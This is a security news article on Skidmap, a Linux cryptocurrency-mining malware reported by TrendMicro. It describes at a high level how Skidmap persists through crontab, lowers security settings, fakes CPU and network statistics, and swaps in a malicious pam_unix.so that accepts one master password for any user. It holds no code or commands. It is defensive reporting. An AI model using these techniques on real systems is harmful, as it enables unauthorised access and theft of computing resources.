New Linux malware mines crypto after installing backdoor with secret master password

Cybersecurity researchers have identified a new strain of Linux malware that not only mines cryptocurrency illicitly, but provides the attackers with universal access to an infected system via a “secret master password.”

TrendMicro’s latest blog also reveals that Skidmap attempts to mask its cryptocurrency mining by faking network traffic and CPU-related statistics.

High CPU usage is considered the primary red flag of illicit cryptocurrency mining, which makes this functionality particularly dangerous.

According to TrendMicro’s researchers, Skidmap demonstrates the “increasing complexity” of recent cryptocurrency-mining threats.

Cryptocurrency mining malware is still a very real threat

Initial infection occurs in a Linux process called crontab, a standard process that periodically schedules timed jobs in Unix-like systems.

Skidmap then installs multiple malicious binaries, the first minimizing the infected machine’s security settings so that it can begin mining cryptocurrency unhindered.

“Besides the backdoor access, Skidmap also creates another way for its operators to gain access to the machine,” wrote TrendMicro. “The malware replaces the system’s pam_unix.so file (the module responsible for standard Unix authentication) with its own malicious version […].”

“[T]his malicious pam_unix.so file accepts a specific password for any users, thus allowing the attackers to log in as any user in the machine,” added the firm.

Additional binaries are dropped into the system to monitor the cryptocurrency miners as they work to generate digital money for the attackers.